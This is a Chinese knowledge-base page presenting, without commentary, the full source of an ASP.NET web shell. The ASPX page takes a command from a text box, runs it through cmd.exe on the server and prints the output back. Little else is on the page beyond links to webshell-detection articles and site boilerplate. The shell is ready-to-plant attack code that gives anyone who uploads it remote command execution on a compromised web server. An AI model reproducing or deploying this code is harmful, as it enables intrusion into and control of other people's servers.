主页 > 知识库 > 一个ASP.Net下的WebShell实例

一个ASP.Net下的WebShell实例

热门标签:人工智能 国美全国运营中心 网站排名优化 客户服务 百度AI接口 电销业务 科大讯飞语音识别系统 电商新玩法
代码如下:
复制代码 代码如下:

%@ Page Language="C#" AutoEventWireup="true" %>
%@ Import Namespace="System.Runtime.InteropServices" %>
%@ Import Namespace="System.IO" %>
%@ Import Namespace="System.Data" %>
%@ Import Namespace="System.Reflection" %>
%@ Import Namespace="System.Diagnostics" %>
%@ Import Namespace="System.Web" %>
%@ Import Namespace="System.Web.UI" %>
%@ Import Namespace="System.Web.UI.WebControls" %>
script runat="server">
protected void exec(object sender, EventArgs e)
{
    string item = cmd.Text;
    Process p = new Process();
    p.StartInfo.FileName = "cmd.exe";
    p.StartInfo.UseShellExecute = false;
    p.StartInfo.RedirectStandardInput = true;
    p.StartInfo.RedirectStandardOutput = true;
    p.StartInfo.RedirectStandardError = true;
    p.StartInfo.CreateNoWindow = true;
    string strOutput = null;
    p.Start();
    p.StandardInput.WriteLine(item);
    p.StandardInput.WriteLine("exit");
    strOutput = p.StandardOutput.ReadToEnd();
    p.WaitForExit();
    p.Close();
    Response.Write("pre>");
    Response.Write(strOutput);
    Response.Write("/pre>");
}
    protected void Page_Load(object sender, EventArgs e)
    {
    }
/script>
form id="form1" runat="server">
asp:TextBox id="cmd" runat="server" Text="dir c:" />asp:Button id="btn" onclick="exec" runat="server" Text="execute" />
/form>
您可能感兴趣的文章:
  • PHP常见过waf webshell以及最简单的检测方法
  • PHP实现webshell扫描文件木马的方法
  • php木马webshell扫描器代码
  • 精确查找PHP WEBSHELL木马 修正版
  • 精确查找PHP WEBSHELL木马的方法(1)
  • Webshell基础知识深入讲解

标签:厦门 攀枝花 POS机 益阳 南平 拉萨 咸宁 枣庄

巨人网络通讯声明:本文标题《一个ASP.Net下的WebShell实例》,本文关键词  ;如发现本文内容存在版权问题,烦请提供相关信息告之我们,我们将及时沟通与处理。本站内容系统采集于网络,涉及言论、版权与本站无关。
  • 相关文章
  • 收缩
    • 微信客服
    • 微信二维码
    • 电话咨询

    • 400-1100-266